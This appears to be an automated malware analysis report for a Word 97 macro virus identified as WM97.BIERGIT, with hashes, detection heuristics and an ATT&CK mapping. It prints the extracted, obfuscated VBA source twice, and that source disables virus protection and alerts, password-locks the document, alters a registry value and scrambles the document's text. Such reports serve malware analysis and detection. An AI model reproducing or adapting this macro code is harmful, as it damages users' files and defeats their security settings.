Office (OLE) malware analysis — malicious · fcbeb2c813179db3

MALICIOUS

Office (OLE)

73.0 KB Created: 1999-06-15 11:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: b173a42fff3d05818f2555e9b40ddf1d SHA-1: 00c111bd6a57dc767e77b80346c0124a9d47cbae SHA-256: fcbeb2c813179db3bde6b0161e80d2e9e2425c32d44bc3e2c3bf79edd1e202b6

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic auto-execution markers and VBA macros, indicating an attempt to run malicious code upon opening. The script explicitly mentions 'Macro Virii Terror Kit' and 'WM97.BIERGIT', suggesting a known malware family, though specific attribution is uncertain. The embedded URL http://www.birgit.de is likely used to download additional malicious content.

Heuristics 5

ClamAV: Doc.Trojan.Biergit-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Biergit-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.birgit.de� In document text (OLE body)
- http://www.birgit.deIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 60642 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	60642 bytes
SHA-256: `a50f5cf4fa2595c762cf1521def5128eba57d2f3dcf9bb739db1b6a79868f7ef`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "BIERGIT" Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer Sub LuAhJh5203() ' -= [zWeiBLuM´s Macro Virii Terror Kit] =- ' -= [WM97.BIERGIT] =- ' -= [ID: 18601-Gm-28815203-Tg.W] =- KhCzCsNqApChJoFkHm = PmEoQwPvLlVuBnBkSg & ItPkRnQqNnLlBkRzUj2904685 On Error Resume Next NkMyAuQwCeLvEvQxVj = RpSoMeDqFlAqVjAkRl & JqBeNoQxQjKfLzHjIf17853943 WordBasic.DisableAutoMacros 0 VfFrKgHnRqAmSvJmNy = MeVqDrNpLsAkSkAiSz & EjItDwMkGiUwIsCoDl34453489 ActiveDocument.ReadOnlyRecommended = False BjQqHjKtUeJeNgUzFv = OhNqVvCkFsBgRgViSh & FgQnAwMrKeTqSlNuNh49412747 With Application EmFpFlNeAoRsInIrSs = QkFqQzMeUsCyPxUjRm & GzBiSxNxNwSkGfDeCy64362005 .EnableCancelKey = wdCancelDisabled MhTiPtEqPeGjAnBgKk = MvJrIqAeEzDsMzThSz & BrJxIiJkDvGfDtUjTi80961551 .DisplayAlerts = wdAlertsNone PlIhNwGxSpPxRuMtCh = NyBrDuLuUzEoLuShRi & CoQrFjJrGrFvNnJpHe9592809 End With BfBwBiTnLfEpJuEiQw = JmEtRlVuEkEiIwSfSw & ThCkQrFeSqPqKfEtCk1253355 With Options DjMvVlAuNpNhEfPvHt = LpStMpKoTkFeHrRfSe & UeKfNrGkAmOkVvQeMg27489612 .ConfirmConversions = False GnAuSnDePzVvVmEnVq = NtKtHtUjNkGwFnQfRj & VxRvKsGrDiMfJpFkBy42448870 .VirusProtection = False OhPnHvQrJpKmNmTyNi = IhNvVkIiTrGqCoQzSw & QpDoVzCePhBwGhAoSi59048416 End With QlEmEySxLeTeItIpFg = KkFvQoTzNqHmBkPeRf & RnKiSeCkTzAqQxMuGe73997674 Randomize DgTfPkJoEqIrAtAeSu = GvIwIeHySxHgUlPySt & NfSyImVtIyKlNpHzBk90597221 If Int((Rnd * 10) + 1) = 10 Then FjHeMmMuHeRkReLrKr = IyAwDiRtMxIyShOySx & OyDsEmVeMuJfBjSjMg5566478 MsgBox "BIERGIT", vbOkOnly, "BIERGIT" HlJkBqKhGpMiPnKxAg = FeFvHnTuLrTuUvCmVj & TsQxCfEfDqJmHjDoMv451661 ActiveDocument.Password = "Birgit" PgByMyBuVfBvHnCmNv = ApIxVeHtQyTpSwBkAx & PlCrOmAoOpUhDyUtHf61769606 ActiveDocument.SaveAs ActiveDocument.FullName SjMyJfDeBpKoCuNzFs = CsAxQiSoKyUlQsAkVf & QiJlLnAuSlSxOrKzSx76728864 Application.Caption = "Birgit" EeFqTnQrQfVfRuGoTk = UhDyIvGnQjUfNtAiBt & LwReAuThIkHsKkFhNh93328410 Application.Username = "Birgit" HhQpRpTxTpItLfQfLh = AkRyDzQiKjVxMpViAy & MtCuTvToLgFnVzQnBz8287668 System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Birgit" PyIiFyKoMfTkEfJrCv = RuVeRqEhQqArJqVgBp & HmKoIgPxBfQiSsLsSj24887214 ActiveDocument.FollowHyperlink Address:="http://www.birgit.de", NewWindow:=False, AddHistory:=True RgThDeNuOpFyVmUiQt = TxNeMuPyJqBnHmUgAu & IjRiFhPhFyPyGlByGf39846472 Dim a As Variant UjIhBhPfReOqQtJvIq = VfFeHyDtDqCiGhThVy & JgDyCiQoIuNsQfMiRx54795730 Dim b As Variant GeBvLpGrKqDiItBkAi = RpIgVoNsJxCzDiTfAq & EuLrNpMxUtCnNtHnMh71395276 Selection.Wholestory JiLuIrJyMeMwDeMxNf = SsAgQsCnCwDvBeSfAv & FrSlKqMiBpAhBnTtAz86354534 a = Selection RyEnTeAoFqBnReFmFu = OhDhIjMmIhDpVfRzBm & AkEfAxIrNoLyUfOxRj2964080 For i = 1 To Len(a) TgPmQgDvIeJfMlQeTr = QkRhDnAhChElTxQzAr & BhLvSyJxRkJsIvDiFe17913338 b = Mid$(a, i, 1) AkEmOjFfKpStHsFrLo = SnJhVrLxShFgStPzVv & CeTpPzJiUgImToPoQw32872596 c = Asc(Mid$(a, i, 1)) IeSeCrSsDfHkVrTgCg = NyMjMiVxBoFxPuPxAn & TsEiFkFrKfShPhKsLg49472143 d = c + 29 KiHzAtVyGpQzQzItQz = PfEjImJrRoGtNqOxAs & UqMyBlFxOxRxEwVyVy64431401 If d > 199 Then c = 30 TzAsKgMpVfFqIyAiIs = LqIlVzTrBvHnKrOvBj & QiUsNsCkDwGsBpQhQi8102947 e$ = e$ + Chr(d) VgLrIiPvBpNiDjLwAp = NtAlQhIlRvIjJnNwAo & RfFmKtCrHsEnLiGnEe9598205 Next i CkArFkSgDeAwUqAnNm = PwOlMlSgKvJeHiMwVs & RyMgGuCxKoDhVyRtPw10959462 Selection.Wholestory KfOjQtIsTqLnMqPyFe = KlRmDxGfQgJvEjMuAk & NrUvSfUkAnNySrMyKg27559008 Selection.Cut MiDjNvLzVeUfHxEpTx = MoJnVfRwKgKrDfLuAp & OoGqPgVrEjMsGkCiUy42508266 WordBasic.Insert e$ VzSxBhCpOqJsVxSeLq = IyMoMsFvQmKlAgKsBg & JgNjEnRePiAnDzTnPi59107812 With Selection.Find BhGwVkFwReSlQiHsCn = JgEoIwPqJmLhVyJsAl & KzVzBoRlTeVhNsItEe74067070 .Text = "Bier" DkRwTmIgTpEzLpSjQk = LjSoDeEkDmMyTuItVp & LwGtUpSrBwUxCmUzOw8 ... (truncated)

SHA-256: a50f5cf4fa2595c762cf1521def5128eba57d2f3dcf9bb739db1b6a79868f7ef

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BIERGIT"
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Sub LuAhJh5203()

    ' -= [zWeiBLuM´s Macro Virii Terror Kit] =-
    ' -= [WM97.BIERGIT] =-

    ' -= [ID: 18601-Gm-28815203-Tg.W] =-

KhCzCsNqApChJoFkHm = PmEoQwPvLlVuBnBkSg & ItPkRnQqNnLlBkRzUj2904685
On Error Resume Next
NkMyAuQwCeLvEvQxVj = RpSoMeDqFlAqVjAkRl & JqBeNoQxQjKfLzHjIf17853943
WordBasic.DisableAutoMacros 0
VfFrKgHnRqAmSvJmNy = MeVqDrNpLsAkSkAiSz & EjItDwMkGiUwIsCoDl34453489
ActiveDocument.ReadOnlyRecommended = False
BjQqHjKtUeJeNgUzFv = OhNqVvCkFsBgRgViSh & FgQnAwMrKeTqSlNuNh49412747
With Application
EmFpFlNeAoRsInIrSs = QkFqQzMeUsCyPxUjRm & GzBiSxNxNwSkGfDeCy64362005
.EnableCancelKey = wdCancelDisabled
MhTiPtEqPeGjAnBgKk = MvJrIqAeEzDsMzThSz & BrJxIiJkDvGfDtUjTi80961551
.DisplayAlerts = wdAlertsNone
PlIhNwGxSpPxRuMtCh = NyBrDuLuUzEoLuShRi & CoQrFjJrGrFvNnJpHe9592809
End With
BfBwBiTnLfEpJuEiQw = JmEtRlVuEkEiIwSfSw & ThCkQrFeSqPqKfEtCk1253355
With Options
DjMvVlAuNpNhEfPvHt = LpStMpKoTkFeHrRfSe & UeKfNrGkAmOkVvQeMg27489612
.ConfirmConversions = False
GnAuSnDePzVvVmEnVq = NtKtHtUjNkGwFnQfRj & VxRvKsGrDiMfJpFkBy42448870
.VirusProtection = False
OhPnHvQrJpKmNmTyNi = IhNvVkIiTrGqCoQzSw & QpDoVzCePhBwGhAoSi59048416
End With
QlEmEySxLeTeItIpFg = KkFvQoTzNqHmBkPeRf & RnKiSeCkTzAqQxMuGe73997674
Randomize
DgTfPkJoEqIrAtAeSu = GvIwIeHySxHgUlPySt & NfSyImVtIyKlNpHzBk90597221
If Int((Rnd * 10) + 1) = 10 Then
FjHeMmMuHeRkReLrKr = IyAwDiRtMxIyShOySx & OyDsEmVeMuJfBjSjMg5566478
MsgBox "BIERGIT", vbOkOnly, "BIERGIT"
HlJkBqKhGpMiPnKxAg = FeFvHnTuLrTuUvCmVj & TsQxCfEfDqJmHjDoMv451661
ActiveDocument.Password = "Birgit"
PgByMyBuVfBvHnCmNv = ApIxVeHtQyTpSwBkAx & PlCrOmAoOpUhDyUtHf61769606
ActiveDocument.SaveAs ActiveDocument.FullName
SjMyJfDeBpKoCuNzFs = CsAxQiSoKyUlQsAkVf & QiJlLnAuSlSxOrKzSx76728864
Application.Caption = "Birgit"
EeFqTnQrQfVfRuGoTk = UhDyIvGnQjUfNtAiBt & LwReAuThIkHsKkFhNh93328410
Application.Username = "Birgit"
HhQpRpTxTpItLfQfLh = AkRyDzQiKjVxMpViAy & MtCuTvToLgFnVzQnBz8287668
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Birgit"
PyIiFyKoMfTkEfJrCv = RuVeRqEhQqArJqVgBp & HmKoIgPxBfQiSsLsSj24887214
ActiveDocument.FollowHyperlink Address:="http://www.birgit.de", NewWindow:=False, AddHistory:=True
RgThDeNuOpFyVmUiQt = TxNeMuPyJqBnHmUgAu & IjRiFhPhFyPyGlByGf39846472
Dim a As Variant
UjIhBhPfReOqQtJvIq = VfFeHyDtDqCiGhThVy & JgDyCiQoIuNsQfMiRx54795730
Dim b As Variant
GeBvLpGrKqDiItBkAi = RpIgVoNsJxCzDiTfAq & EuLrNpMxUtCnNtHnMh71395276
Selection.Wholestory
JiLuIrJyMeMwDeMxNf = SsAgQsCnCwDvBeSfAv & FrSlKqMiBpAhBnTtAz86354534
a = Selection
RyEnTeAoFqBnReFmFu = OhDhIjMmIhDpVfRzBm & AkEfAxIrNoLyUfOxRj2964080
For i = 1 To Len(a)
TgPmQgDvIeJfMlQeTr = QkRhDnAhChElTxQzAr & BhLvSyJxRkJsIvDiFe17913338
b = Mid$(a, i, 1)
AkEmOjFfKpStHsFrLo = SnJhVrLxShFgStPzVv & CeTpPzJiUgImToPoQw32872596
c = Asc(Mid$(a, i, 1))
IeSeCrSsDfHkVrTgCg = NyMjMiVxBoFxPuPxAn & TsEiFkFrKfShPhKsLg49472143
d = c + 29
KiHzAtVyGpQzQzItQz = PfEjImJrRoGtNqOxAs & UqMyBlFxOxRxEwVyVy64431401
If d > 199 Then c = 30
TzAsKgMpVfFqIyAiIs = LqIlVzTrBvHnKrOvBj & QiUsNsCkDwGsBpQhQi8102947
e$ = e$ + Chr(d)
VgLrIiPvBpNiDjLwAp = NtAlQhIlRvIjJnNwAo & RfFmKtCrHsEnLiGnEe9598205
Next i
CkArFkSgDeAwUqAnNm = PwOlMlSgKvJeHiMwVs & RyMgGuCxKoDhVyRtPw10959462
Selection.Wholestory
KfOjQtIsTqLnMqPyFe = KlRmDxGfQgJvEjMuAk & NrUvSfUkAnNySrMyKg27559008
Selection.Cut
MiDjNvLzVeUfHxEpTx = MoJnVfRwKgKrDfLuAp & OoGqPgVrEjMsGkCiUy42508266
WordBasic.Insert e$
VzSxBhCpOqJsVxSeLq = IyMoMsFvQmKlAgKsBg & JgNjEnRePiAnDzTnPi59107812
With Selection.Find
BhGwVkFwReSlQiHsCn = JgEoIwPqJmLhVyJsAl & KzVzBoRlTeVhNsItEe74067070
.Text = "Bier"
DkRwTmIgTpEzLpSjQk = LjSoDeEkDmMyTuItVp & LwGtUpSrBwUxCmUzOw8
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.